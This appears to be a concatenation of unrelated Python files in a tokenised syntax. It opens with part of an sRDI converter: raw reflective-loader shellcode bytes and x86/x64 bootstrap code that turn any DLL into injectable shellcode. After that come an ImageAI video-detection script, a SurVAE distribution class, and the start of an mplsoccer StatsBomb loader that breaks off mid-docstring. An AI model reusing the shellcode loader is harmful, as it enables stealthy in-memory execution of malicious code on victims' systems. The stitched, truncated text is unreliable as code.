\xC7\x44\x24\x7C\x61\x74\x69\x76'<concat>b'\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45'<concat>b'\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74'<concat>b'\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x7F\x08\x00\x00\xB9\xB5\x41'<concat>b'\xD9\x5E\x48\x8B\xD8\xE8\x72\x08\x00\x00\x4C\x8B\xE8\x48\x89\x45\xD0\x48\x8D\x45\xD8\xC7'<concat>b'\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33'<concat>b'\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x30\x4C'<concat>b'\x8D\x4D\xC8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C'<
concat>b'\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x00\xC7\x44\x24'<concat>b'\x28\x0E\x00\x0E\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8D\x45\xA8\xC7\x44\x24\x28\x15'<concat>b'\x00\x15\x00\x48\x8B\x4C\x24\x38\x4C\x8D\x4D\x08\x45\x33\xC0\x48\x89\x44\x24\x30\x48\x8D'<concat>b'\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44'<concat>b'\x24\x30\x4C\x8D\x4D\x10\xC7\x44\x24\x28\x13\x00\x13\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5'<concat>b'\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF0'<concat>b'\xC7\x44\x24\x28\x05\x00\x05\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48'<concat>b'\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x18\xC7\x44\x24\x28\x13\x00\x13'<concat>b'\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0'<concat>b'\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28'<concat>b'\x41\xFF\xD5\x4C\x39\x7D\xC8\x0F\x84\x1D\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\x13\x07\x00'<concat>b'\x00\x4C\x39\x7D\xF0\x0F\x84\x09\x07\x00\x00\x4C\x39\x7D\x08\x0F\x84\xFF\x06\x00\x00\x48'<concat>b'\x8B\x55\x10\x48\x85\xD2\x0F\x84\xF2\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50'<concat>b'\x45\x00\x00\x0F\x85\xDF\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xD0\x06'<concat>b'\x00\x00\x45\x8D\x4F\x01\x44\x84\x4F\x38\x0F\x85\xC2\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B'<concat>b'\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x25\x44\x0F\xB7\x47\x06\x48\x03\xCF\x44\x39'<concat>b'\x79\x04\x8B\x47\x38\x0F\x45\x41\x04\x03\x01\x48\x8D\x49\x28\x3B\xC3\x0F\x46\xC3\x8B\xD8'<concat>b'\x4D\x2B\xC1\x75\xE3\x48\x8D\x4D\x38\xFF\xD2\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7'<concat>b'\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40'<concat>b'\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x54\x06\x00\x00\x48\x8B\x4F\x30\x41\xBC'<concat>b'\x00\x30\x0
0\x00\x45\x8B\xC4\x41\xB9\x04\x00\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8'<concat>b'\x48\x85\xC0\x75\x12\x44\x8D\x48\x04\x45\x8B\xC4\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B'<concat>b'\xD8\x44\x8B\xA5\xD0\x00\x00\x00\x41\xBB\x01\x00\x00\x00\x45\x84\xE3\x74\x1D\x8B\x46\x3C'<concat>b'\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54'<concat>b'\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88'<concat>b'\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44'<concat>b'\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45'<concat>b'\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48'<concat>b'\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83'<concat>b'\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84'<concat>b'\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00'<concat>b'\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00'<concat>b'\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75'<concat>b'\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04'<concat>b'\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB'<concat>b'\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6'<concat>b'\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1'<concat>b'\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03'<concat>b'\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C'<concat>b'\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39'<concat>b'\xBF\x94\x00\x00\x00\x0F\x84\x8
2\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D'<concat>b'\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x41\x8B'<concat>b'\xC4\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x89\x00\x00\x00\x45\x3B\xEB\x0F\x86\x80\x00'<concat>b'\x00\x00\x41\xC1\xEC\x10\x45\x8D\x5D\xFF\x45\x8B\xD7\x45\x85\xDB\x74\x74\x4D\x8B\xC8\x41'<concat>b'\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03'<concat>b'\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10'<concat>b'\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x10\x41\x0F'<concat>b'\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41'<concat>b'\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\xEB\x04\x44\x8B'<concat>b'\x65\xC0\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xB1\x00\x00\x00\x8B\x7D\xC0\x8B'<concat>b'\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10'<concat>b'\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x5F\x48\x85\xC9\x79\x08\x45\x0F\xB7'<concat>b'\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48'<concat>b'\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x30\x45\x33\xC0\x48\x8D\x54\x24'<concat>b'\x28\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4D\x8B\xCF\x49\x8B\xCA\xFF\x55\xD0\x49\x83'<concat>b'\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA1\x45'<concat>b'\x33\xFF\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xF0'<concat>b'\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x56\xFF\xFF\xFF\x48\x8B\x7D\x30\x4C\x8B\x6D'<concat>b'\xD0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xA9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49'<concat>b'\x83\xC7\x04\x4C\x03\xFB\x45\x33\xE4\x41\x8B\x07\x85\xC0\x0F\x84\x8A\x00\x00\x00\x8B\xC8'<concat>b'\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8
B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C'<concat>b'\x48\x03\xF3\x4C\x03\xF3\x4C\x39\x26\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7'<concat>b'\xC2\x33\xD2\xEB\x34\x4C\x8D\x43\x02\x49\x8B\xC4\x4C\x03\xC2\x45\x38\x20\x74\x0E\x49\x8B'<concat>b'\xD0\x48\xFF\xC2\x48\xFF\xC0\x44\x38\x22\x75\xF5\x4C\x89\x44\x24\x30\x48\x8D\x54\x24\x28'<concat>b'\x45\x33\xC0\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4C\x8B\xCE\x41\xFF\xD5\x48\x83\xC6'<concat>b'\x08\x49\x83\xC6\x08\x4C\x39\x26\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x49\x83\xC7\x20\xE9'<concat>b'\x6B\xFF\xFF\xFF\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00'<concat>b'\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\x0B\x01\x00\x00\x48\x03\xF7\x44\x39\x3E\x0F\x84\xEB'<concat>b'\x00\x00\x00\x8B\x46\x14\x8B\xC8\x81\xE1\x00\x00\x00\x20\x75\x17\x0F\xBA\xE0\x1E\x72\x11'<concat>b'\x85\xC0\x78\x0D\x45\x8B\xC4\x44\x89\x64\x24\x20\xE9\xA4\x00\x00\x00\x85\xC9\x75\x3C\x0F'<concat>b'\xBA\xE0\x1E\x72\x0A\x85\xC0\x79\x06\x44\x8D\x41\x08\xEB\x68\x85\xC9\x75\x28\x0F\xBA\xE0'<concat>b'\x1E\x73\x0A\x85\xC0\x78\x06\x44\x8D\x41\x02\xEB\x54\x85\xC9\x75\x14\x0F\xBA\xE0\x1E\x73'<concat>b'\x0A\x85\xC0\x79\x06\x44\x8D\x41\x04\xEB\x40\x85\xC9\x74\x5F\x0F\xBA\xE0\x1E\x72\x0C\x85'<concat>b'\xC0\x78\x08\x41\xB8\x10\x00\x00\x00\xEB\x2A\x85\xC9\x74\x49\x0F\xBA\xE0\x1E\x72\x0C\x85'<concat>b'\xC0\x79\x08\x41\xB8\x80\x00\x00\x00\xEB\x14\x85\xC9\x74\x33\x0F\xBA\xE0\x1E\x73\x11\x85'<concat>b'\xC0\x78\x0D\x41\xB8\x20\x00\x00\x00\x44\x89\x44\x24\x20\xEB\x21\x85\xC9\x74\x18\x0F\xBA'<concat>b'\xE0\x1E\x73\x12\x44\x8B\x44\x24\x20\x85\xC0\xB9\x40\x00\x00\x00\x44\x0F\x48\xC1\xEB\xDD'<concat>b'\x44\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44'<concat>b'\x24\x20\x8B\x4E\xFC\x4C\x8D\x4C\x24\x20\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06'<concat>b'\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\xF8\xFE\xFF\xFF\x45\x33\xC0\x33\xD2\x48'<concat>b'\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD
0\x00\x00\x00\x48'<concat>b'\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48'<concat>b'\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00'<concat>b'\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1'<concat>b'\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28'<concat>b'\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x8B\xB5\xB8\x00\x00\x00\x85\xF6'<concat>b'\x0F\x84\x97\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\x8A\x00\x00\x00\x8B\x8F\x88'<concat>b'\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x74\x78\x44\x39\x79\x14\x74\x72\x44'<concat>b'\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x5D\x45\x8B'<concat>b'\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x52\xEB\x0D\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x4D'<concat>b'\x03\xC4\x41\x8A\x00\x84\xC0\x75\xEC\x41\x3B\xF2\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC'<concat>b'\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x22\xEB\xC3\x8B\x41\x1C\x0F\xB7\x0A\x48'<concat>b'\x03\xC3\x8B\x95\xC8\x00\x00\x00\x44\x8B\x04\x88\x48\x8B\x8D\xC0\x00\x00\x00\x4C\x03\xC3'<concat>b'\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70'<concat>b'\x01\x00\x00\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\xC3\xCC\x48\x8B\xC4\x48\x89\x58'<concat>b'\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B'<concat>b'\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41'<concat>b'\x30\x4D\x85\xC0\x0F\x84\xB3\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C\x41\x8B\xD6'<concat>b'\x4D\x8B\x09\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48'<concat>b'\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xD0'<concat>b'\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xEA'<c
oncat>b'\x01\x75\xE7\x4F\x8D\x14\x18\x45\x8B\xDE\x41\x8B\x7A\x20\x49\x03\xF8\x45\x39\x72\x18\x76'<concat>b'\x8E\x8B\x37\x41\x8B\xDE\x49\x03\xF0\x48\x8D\x7F\x04\x0F\xBE\x0E\x48\xFF\xC6\xC1\xCB\x0D'<concat>b'\x03\xD9\x84\xC9\x75\xF1\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC3\x45\x3B\x5A\x18\x72\xD5'<concat>b'\xE9\x5E\xFF\xFF\xFF\x41\x8B\x42\x24\x43\x8D\x0C\x1B\x49\x03\xC0\x0F\xB7\x14\x01\x41\x8B'<concat>b'\x4A\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B'<concat>b'\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3 '<line_sep># MARKER:E
<if_stmt>sRDI.is64BitDLL(dll_bytes)<block_start>rdi_shellcode=rdi_shellcode64<line_sep>bootstrap=b''<line_sep>bootstrap_size=64<line_sep># call next instruction (Pushes next instruction address to stack)
bootstrap<augadd>b'\xe8\x00\x00\x00\x00'<line_sep># Set the offset to our DLL from pop result
dll_offset=bootstrap_size-len(bootstrap)+len(rdi_shellcode)<line_sep># pop rcx - Capture our current location in memory
bootstrap<augadd>b'\x59'<line_sep># mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
bootstrap<augadd>b'\x49\x89\xc8'<line_sep># add rcx, <Offset of the DLL>
bootstrap<augadd>b'\x48\x81\xc1'<line_sep>bootstrap<augadd>struct.pack('I' dll_offset)<line_sep># mov edx, <Hash of function>
bootstrap<augadd>b'\xba'<line_sep>bootstrap<augadd>struct.pack('I' function_hash)<line_sep># Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
bootstrap<augadd>b'\x49\x81\xc0'<line_sep>user_data_location=dll_offset+len(dll_bytes)<line_sep>bootstrap<augadd>struct.pack('I' user_data_location)<line_sep># mov r9d, <Length of User Data>
bootstrap<augadd>b'\x41\xb9'<line_sep>bootstrap<augadd>struct.pack('I' len(user_data))<line_sep># push rsi - save original value
bootstrap<augadd>b'\x56'<line_sep># mov rsi, rsp - store our current stack pointer for later
bootstrap<augadd>b'\x48\x89\xe6'<line_sep># and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
bootstrap<augadd>b'\x48\x83\xe4\xf0'<line_sep># sub rsp, 0x30 - Create some breathing room on the stack
bootstrap<augadd>b'\x48\x83\xec'<line_sep>bootstrap<augadd>b'\x30'# 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
bootstrap<augadd>b'\xC7\x44\x24'<line_sep>bootstrap<augadd>b'\x20'<line_sep>bootstrap<augadd>struct.pack('I' flags)<line_sep># call - Transfer execution to the RDI
bootstrap<augadd>b'\xe8'<line_sep>bootstrap<augadd>struct.pack('b' bootstrap_size-len(bootstrap)-4)<line_sep># Skip over the remainder of instructions
bootstrap<augadd>b'\x00\x00\x00'<line_sep># mov rsp, rsi - Reset our original stack pointer
bootstrap<augadd>b'\x48\x89\xf4'<line_sep># pop rsi - Put things back where we left them
bootstrap<augadd>b'\x5e'<line_sep># ret - return to caller
bootstrap<augadd>b'\xc3'<if_stmt>len(bootstrap)<ne>bootstrap_size<block_start><raise>Exception(f"x64 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")<block_end># Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
<return>bootstrap+rdi_shellcode+dll_bytes+user_data<block_end><else_stmt># 32 bit
<block_start>rdi_shellcode=rdi_shellcode32<line_sep>bootstrap=b''<line_sep>bootstrap_size=49<line_sep># call next instruction (Pushes next instruction address to stack)
bootstrap<augadd>b'\xe8\x00\x00\x00\x00'<line_sep># Set the offset to our DLL from pop result
dll_offset=bootstrap_size-len(bootstrap)+len(rdi_shellcode)<line_sep># pop eax - Capture our current location in memory
bootstrap<augadd>b'\x58'<line_sep># push ebp
bootstrap<augadd>b'\x55'<line_sep># mov ebp, esp
bootstrap<augadd>b'\x89\xe5'<line_sep># mov edx, eax - copy our location in memory to ebx before we start modifying eax
bootstrap<augadd>b'\x89\xc2'<line_sep># add eax, <Offset to the DLL>
bootstrap<augadd>b'\x05'<line_sep>bootstrap<augadd>struct.pack('I' dll_offset)<line_sep># add edx, <Offset to the DLL> + <Size of DLL>
bootstrap<augadd>b'\x81\xc2'<line_sep>user_data_location=dll_offset+len(dll_bytes)<line_sep>bootstrap<augadd>struct.pack('I' user_data_location)<line_sep># push <Flags>
bootstrap<augadd>b'\x68'<line_sep>bootstrap<augadd>struct.pack('I' flags)<line_sep># push <Length of User Data>
bootstrap<augadd>b'\x68'<line_sep>bootstrap<augadd>struct.pack('I' len(user_data))<line_sep># push edx
bootstrap<augadd>b'\x52'<line_sep># push <hash of function>
bootstrap<augadd>b'\x68'<line_sep>bootstrap<augadd>struct.pack('I' function_hash)<line_sep># push eax
bootstrap<augadd>b'\x50'<line_sep># call - Transfer execution to the RDI
bootstrap<augadd>b'\xe8'<line_sep>bootstrap<augadd>struct.pack('b' bootstrap_size-len(bootstrap)-4)<line_sep># Skip over the remainder of instructions
bootstrap<augadd>b'\x00\x00\x00'<line_sep># add esp, 0x14 - remove arguments from stack (cdecl)
bootstrap<augadd>b'\x83\xc4\x14'<line_sep># leave
bootstrap<augadd>b'\xc9'<line_sep># ret - return to caller
bootstrap<augadd>b'\xc3'<if_stmt>len(bootstrap)<ne>bootstrap_size<block_start><raise>Exception(f"x86 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")<block_end># Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
<return>bootstrap+rdi_shellcode+dll_bytes+user_data<block_end><block_end><def_stmt>transform self target<block_start>dll=open(target 'rb').read()<line_sep>flags=self.flags<line_sep>converted=sRDI.ConvertToShellcode(dll sRDI.HashFunctionName(self.function) self.args flags)<line_sep><return>converted<block_end><def_stmt>set_additional_arguments self **kwargs<block_start><if_stmt>"function"<in>kwargs['kwargs'].keys()<block_start>function=kwargs['kwargs']['function']<if_stmt>function<and>function<ne>""<block_start>self.function=function<block_end><block_end><if_stmt>"params"<in>kwargs['kwargs'].keys()<block_start>params=kwargs['kwargs']['params']<if_stmt>params<and>params<ne>""<block_start>self.args=params<block_end><block_end><block_end><block_end> |
<import_from_stmt>imageai.Detection.Custom CustomVideoObjectDetection<import_stmt>os<line_sep>execution_path=os.getcwd()<line_sep>video_detector=CustomVideoObjectDetection()<line_sep>video_detector.setModelTypeAsYOLOv3()<line_sep>video_detector.setModelPath("hololens-ex-60--loss-2.76.h5")# download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/hololens-ex-60--loss-2.76.h5
video_detector.setJsonPath("detection_config.json")# download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/detection_config.json
video_detector.loadModel()<line_sep>video_detector.detectObjectsFromVideo(input_file_path="holo1.mp4" output_file_path=os.path.join(execution_path "holo1-detected3") frames_per_second=20 minimum_percentage_probability=40 log_progress=<true>)<line_sep> |
<import_stmt>torch<import_from_stmt>torch.distributions Categorical<import_from_stmt>survae.distributions.conditional ConditionalDistribution<import_from_stmt>survae.utils sum_except_batch<class_stmt>ConditionalCategorical(ConditionalDistribution)<block_start>"""A Categorical distribution with conditional logits."""<def_stmt>__init__ self net<block_start>super(ConditionalCategorical self).__init__()<line_sep>self.net=net<block_end><def_stmt>cond_dist self context<block_start>logits=self.net(context)<line_sep><return>Categorical(logits=logits)<block_end><def_stmt>log_prob self x context<block_start>dist=self.cond_dist(context)<line_sep><return>sum_except_batch(dist.log_prob(x))<block_end><def_stmt>sample self context<block_start>dist=self.cond_dist(context)<line_sep><return>dist.sample()<block_end><def_stmt>sample_with_log_prob self context<block_start>dist=self.cond_dist(context)<line_sep>z=dist.sample()<line_sep>log_prob=dist.log_prob(z)<line_sep>log_prob=sum_except_batch(log_prob)<line_sep><return>z log_prob<block_end><def_stmt>logits self context<block_start><return>self.cond_dist(context).logits<block_end><def_stmt>probs self context<block_start><return>self.cond_dist(context).probs<block_end><def_stmt>mode self context<block_start><return>self.cond_dist(context).logits.argmax(-1)<block_end><block_end> |
""" `mplsoccer.statsbomb` is a python module for loading StatsBomb data. """<line_sep># Authors: <NAME>, https://twitter.com/numberstorm
# License: MIT
<import_stmt>os<import_stmt>warnings<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<line_sep>EVENT_SLUG='https://raw.githubusercontent.com/statsbomb/open-data/master/data/events'<line_sep>MATCH_SLUG='https://raw.githubusercontent.com/statsbomb/open-data/master/data/matches'<line_sep>LINEUP_SLUG='https://raw.githubusercontent.com/statsbomb/open-data/master/data/lineups'<line_sep>COMPETITION_URL=('https://raw.githubusercontent.com/statsbomb/open-data/'<concat>'master/data/competitions.json')<line_sep>STATSBOMB_WARNING=('Please be responsible with Statsbomb data.'<concat>'Register your details on https://www.statsbomb.com/resource-centre'<concat>'and read the User Agreement carefully (on the same page).')<def_stmt>_split_location_cols df col new_cols<block_start>""" Location is stored as a list. split into columns. """<for_stmt>new_col new_cols<block_start>df[new_col]=np.nan<block_end><if_stmt>col<in>df.columns<block_start>mask_not_null=df[col].notnull()<line_sep>df_not_null=df.loc[mask_not_null col]<line_sep>df_new=pd.DataFrame(df_not_null.tolist() index=df_not_null.index)<line_sep>new_cols=new_cols[:len(df_new.columns)]# variable whether z location is present
df_new.columns=new_cols<line_sep>df.loc[mask_not_null new_cols]=df_new<line_sep>df.drop(col axis=1 inplace=<true>)<block_end><block_end><def_stmt>_list_dictionary_to_df df col value_name var_name id_col='id'<block_start>""" Some columns are a list of dictionaries. This turns them into a new dataframe of rows."""<line_sep>df=df.loc[df[col].notnull() [id_col col]]<line_sep>df.set_index(id_col inplace=<true>)<line_sep>df=df[col].apply(pd.Series).copy()<line_sep>df.reset_index(inplace=<true>)<line_sep>df=df.melt(id_vars=id_col value_name=value_name var_name=var_name)<line_sep>df[var_name]=df[var_name]+1<line_sep>df=df[df[value_name].notnull()].copy()<line_sep>df.reset_index(inplace=<true> drop=<true>)<line_sep><return>df<block_end><def_stmt>_split_dict_col df col<block_start>""" Function to split a dictionary column to separate columns."""<line_sep># handle missing data by filling with an empty dictionary
df[col]=df[col].apply(<lambda>x:{}<if>pd.isna(x)<else>x)<line_sep># split the non-missing data and change the column names
df_temp_cols=pd.json_normalize(df[col]).set_index(df.index)<line_sep>col_names=df_temp_cols.columns<line_sep># note add column description to column name if doesn't already contain it
col_names=[c.replace('.' '_')<if>c[:len(col)]<eq>col<else>(col+'_'+c).replace('.' '_')<for>c col_names]<line_sep>df[col_names]=df_temp_cols<line_sep># drop old column
df.drop(col axis=1 inplace=<true>)<line_sep><return>df<block_end><def_stmt>_simplify_cols_and_drop df col cols=<none><block_start>""" Function to merge similar columns together and drop original columns. """<if_stmt>cols<is><none><block_start>cols=df.columns[df.columns.str.contains(col)]<block_end>df_melt=df[cols].melt(ignore_index=<false>).copy()<line_sep>df_melt=df_melt[df_melt.value.notnull()].copy()<line_sep>df.loc[df_melt.index col]=df_melt.value<line_sep>df.drop(cols axis=1 errors='ignore' inplace=<true>)<line_sep><return>df<block_end><def_stmt>read_event path_or_buf related_event_df=<true> shot_freeze_frame_df=<true> tactics_lineup_df=<true> warn=<true><block_start>""" Extracts individual event json and loads as a dictionary of up to
four pandas.DataFrame: ``event``, ``related event``, ``shot_freeze_frame``,
and ``tactics_lineup``.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
related_event_df : bool, default True
Whether to return a ``related_event`` Dataframe in the returned dictionary.
shot_freeze_frame_df : bool, default True
Whether to return a ``shot_freeze_frame`` in the returned dictionary.
tactics_lineup_df : bool, default True
